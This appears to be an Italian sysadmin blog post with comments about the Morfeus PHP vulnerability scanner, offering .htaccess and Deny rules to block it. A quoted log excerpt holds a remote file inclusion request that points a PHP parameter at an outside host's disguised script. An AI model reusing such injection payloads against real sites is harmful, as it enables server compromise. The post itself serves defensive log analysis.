Se avete notato questo strano user agent nel log del vostro server "Morfeus Fucking Scanner", sappiate che si tratta di un bot che cerca vulnerabilità nelle applicazioni PHP.
Al momento, su questo server, il rompi scatole è made in spain. Ma scorrendo i vecchi log mi sono accorto che spesso veniva dagli Sati Uniti.
Sembra comunque non aver trovato nessuna vulnerabilità. Dato che nei log non trovo chiamate post andate a buon fine da parte del simpaticone, che accessi strani dell’IP relativo. Tutto il resto sembra funzionare regolarmente apparte qualche rallentamento, anche pesante, del server, dovuto alle continue richieste.
Se state usando Apache, potete bloccare Morfeus usando .htaccess
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^Morfeus
RewriteRule ^.*$ – [F]
E tanti saluti a Morfeus 😉
Mi hai incuriosito 🙂 …
primo:/var/log/apache2/primo# grep -ri Morfeus * | cut -d -f7,12-17 | sort | uniq
/bb/jscripts/post.js "Morfeus strikes again."
/bbs/jscripts/post.js "Morfeus strikes again."
/chat/jscripts/post.js "Morfeus strikes again."
/community/jscripts/post.js "Morfeus strikes again."
/foro/jscripts/post.js "Morfeus strikes again."
/foros/jscripts/post.js "Morfeus strikes again."
/forum/jscripts/post.js "Morfeus strikes again."
/forums/jscripts/post.js "Morfeus strikes again."
/jscripts/post.js "Morfeus strikes again."
/mybb/jscripts/post.js "Morfeus strikes again."
/myBB/jscripts/post.js "Morfeus strikes again."
/MyBB/jscripts/post.js "Morfeus strikes again."
/phgstats/index.php?phgdir=http://80.34.102.151/joomla/1.gif?/ "Morfeus Fucking Scanner"
/phorum/jscripts/post.js "Morfeus strikes again."
Sono troppo avanti: Tu hai Morfeus Fucking Scanner, io ho gia' Morfeus strikes again 😀 !!
Mi ricordo che ai tempi di codered, avevo usato una rule simile alla tua, ma rimandavo il traffico su … 127.0.0.1 😛 !
Lo sai che qui in Sicilia tutto arriva dopo, anche i Morfeus li abbiamo datati 😀
@Giambo
Che strano : qualche settimana fa , nel canale ubuntu-it un tizio si lamentava del fatto che nmap non funzionava e postava relativa riga di comando ; l'aveva anche postata sul forum di ubuntu ; sono quasi stato tentato di provare con il classico copia incolla, ma con programmi come nmap bisogna sempre andarci un po' cauti : in effetti il tizio aveva programmato un Idle Scan in cui l'Ip zombie apparteneva allo stesso range di IP che compare nei tuoi log …
Mi sono fatto l'idea che il tizio avesse fatto una (maldestra) operazione di social engeneering , anche perchè aveva sostituito l'IP da scansionare con una pseudo variabile nominata $MIO-IP , confidando probabilmente nel fatto che i malcapitati sostituissero quel campo con il proprio IP. Nelle pagine del manuale di nmap mi sembra di aver letto che una scansione di questo tipo non restituisce alcun risultato , poichè tutto viene spedito all'IP zombie ; ma se a quell'IP c'è qualcosa che ascolta , il risultato della scansione giunge lì … XD
Non ricordo il nick usato in Irc , nè quello sul forum …ma il range si e non mi chiedere perchè XD
Quando ho realizzato le sue intenzioni , mi sono limitato a dirgli che c'aveva provato XD
Ok ok … ho esagerato e probabilmente avrò preso un abbaglio formato gigante XD
scanners ip: 196.15.143.142
solution:
add "Deny from 196.15.143.142" in root dir section of apache cfg file. (this way u don't need to edid htacces in every directory)
Thanks patryk.
Consider not all hosting services give permission to edit the httpd.conf. So often a .htaccess rule is the best solution.